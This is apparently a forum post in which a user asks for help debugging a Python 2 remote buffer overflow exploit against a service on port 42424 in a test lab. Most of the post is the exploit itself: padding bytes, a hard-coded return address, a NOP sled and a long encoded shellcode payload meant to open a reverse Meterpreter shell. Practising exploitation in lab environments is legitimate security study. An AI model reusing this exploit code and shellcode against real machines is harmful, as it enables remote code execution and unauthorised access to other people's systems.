Can someone please help me with my BOF code


Recommended Posts

Hi, I am attempting to exploit a remote buffer overflow as part of a test lab environment.

The exploit works fine in a Windows 7 test VM, and I can get a reverse Meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM.

However, when I attempt this in the test environment against the machine that I know is running the application on port 42424, I do not get the reverse shell. I have tried this with both x86 and x64 shellcode. If I test locally on the Kali machine I can crash the application, but again I do not get a shell. My exploit code is below:

#!/usr/bin/env python2
import socket

ServiceManagerIP = "127.0.0.1"
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))


payload = "\xc3"*146    #Junk Bytes
#77E9F7DF

payload += "\xDF\xF7\xE9\x77" + "\x90" *16

#Shellcode to be executed by application

payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
"\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
"\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
"\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
"\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
"\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
"\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
"\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
"\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
"\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
"\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
"\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
"\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
"\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
"\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
"\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
"\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
"\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
"\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
"\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
"\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
"\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
"\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
"\x35\x96\xaf\x2a\x36\xb3")

s.send(payload + "\r\n")
# The original line read s.recv(len(msg)), but msg is never defined and raises NameError;
# read a fixed-size response instead.
data = s.recv(1024)
s.close()
print data
